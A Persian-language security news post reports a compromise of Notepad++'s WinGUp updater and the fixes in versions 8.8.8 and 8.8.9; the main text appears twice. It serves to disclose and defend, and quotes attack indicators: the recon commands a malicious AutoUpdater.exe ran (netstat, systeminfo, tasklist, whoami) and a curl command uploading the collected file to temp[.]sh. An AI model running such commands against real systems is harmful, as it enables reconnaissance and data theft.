🔴 ضعف امنیتی در بروزرسانی ++Notepad
نرم افزار ++Notepad برای بروزرسانی خودش از GUP.exe (WinGUp) استفاده میکنه. فرایند بروزرسانی هم اینطوریه که درخواستی به این آدرس ارسال میکنه:
اگه مورد جدیدی باشه، یک فایل XML با محتویات زیر برمیگردونه:
اخیرا یکی از کاربران گزارش داده که WinGUp یک فایل در مسیر زیر ایجاد میکنه:
و یسری دستورات مرتبط با ریکان رو اجرا و در فایل a.txt ذخیره میکنه:
بعدش، autoupdater.exe این فایل رو از طریق curl.exe به temp[.]sh ارسال میکنه.
کاربرا 2 تا حدس میزنن: یا اینکه کاربر از یک نسخه ی آلوده استفاده میکنه (Malvertising) یا اینکه ترافیک بروزرسانی دستکاری شده.
محقق امنیتی Kevin Beaumont اعلام کرده که اوایل این ماه سه سازمان در شرق آسیا، از این طرق هک شدن و احتمال میده که هکرها از طریق دستکاری ترافیک و تغییر مقدار Location در XML، تونستن این کار انجام بدن.
با توجه به اینکه ترافیک این سایت بدلیل تعداد کاربراش قابل شناسایی هستش و همچنین مهاجم با قرار گرفتن در مسیر ISP میتونه ترافیک رو دستکاری کنه، 18 نوامبر، نسخه ی 8.8.8 منتشر شده که فقط بروزرسانی رو از گیتهاب میگرفت. (گیتهاب ترافیکش برای شناسایی سختتره - کاربراش زیادن)
9 دسامبر هم نسخه ی 8.8.9 منتشر شده که مانع نصب هر گونه بروزرسانی میشه که با گواهی امضای کد سازنده امضا نشده باشه.
توسعه دهنده ی ++Notepad هم اعلام کرده که تحقیقات برای مشخصکردن روش دقیق سرقت و دستکاری ترافیک ادامه داره. بعد از رسیدن به شواهد قطعی، کاربران مطلع خواهند شد.
توصیه شده، نسخه 8.8.9 رو از سایت اصلی بصورت دستی دانلود و نصب کنید./منبع
#آسیب_پذیری_امنیتی
#NotepadPlusPlus
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
نرم افزار ++Notepad برای بروزرسانی خودش از GUP.exe (WinGUp) استفاده میکنه. فرایند بروزرسانی هم اینطوریه که درخواستی به این آدرس ارسال میکنه:
https://notepad-plus-plus.org/update/getDownloadUrl.php?version=<versionnumber>
اگه مورد جدیدی باشه، یک فایل XML با محتویات زیر برمیگردونه:
<GUP>
<script/>
<NeedToBeUpdated>yes</NeedToBeUpdated>
<Version>8.8.8</Version>
<Location>https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v8.8.8/npp.8.8.8.Installer.exe</Location>
</GUP>
اخیرا یکی از کاربران گزارش داده که WinGUp یک فایل در مسیر زیر ایجاد میکنه:
%Temp%\AutoUpdater.exe
و یسری دستورات مرتبط با ریکان رو اجرا و در فایل a.txt ذخیره میکنه:
cmd /c netstat -ano >> a.txt
cmd /c systeminfo >> a.txt
cmd /c tasklist >> a.txt
cmd /c whoami >> a.txt
بعدش، autoupdater.exe این فایل رو از طریق curl.exe به temp[.]sh ارسال میکنه.
کاربرا 2 تا حدس میزنن: یا اینکه کاربر از یک نسخه ی آلوده استفاده میکنه (Malvertising) یا اینکه ترافیک بروزرسانی دستکاری شده.
محقق امنیتی Kevin Beaumont اعلام کرده که اوایل این ماه سه سازمان در شرق آسیا، از این طرق هک شدن و احتمال میده که هکرها از طریق دستکاری ترافیک و تغییر مقدار Location در XML، تونستن این کار انجام بدن.
با توجه به اینکه ترافیک این سایت بدلیل تعداد کاربراش قابل شناسایی هستش و همچنین مهاجم با قرار گرفتن در مسیر ISP میتونه ترافیک رو دستکاری کنه، 18 نوامبر، نسخه ی 8.8.8 منتشر شده که فقط بروزرسانی رو از گیتهاب میگرفت. (گیتهاب ترافیکش برای شناسایی سختتره - کاربراش زیادن)
9 دسامبر هم نسخه ی 8.8.9 منتشر شده که مانع نصب هر گونه بروزرسانی میشه که با گواهی امضای کد سازنده امضا نشده باشه.
توسعه دهنده ی ++Notepad هم اعلام کرده که تحقیقات برای مشخصکردن روش دقیق سرقت و دستکاری ترافیک ادامه داره. بعد از رسیدن به شواهد قطعی، کاربران مطلع خواهند شد.
توصیه شده، نسخه 8.8.9 رو از سایت اصلی بصورت دستی دانلود و نصب کنید./منبع
#آسیب_پذیری_امنیتی
#NotepadPlusPlus
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
Community
autoupdater and connection temp.sh
Submission for any help regarding a finding that came through from AutoUpdater!? Malicious command seen: curl.exe -F "[email protected]" -s https://temp[.]sh/uploa...
❤8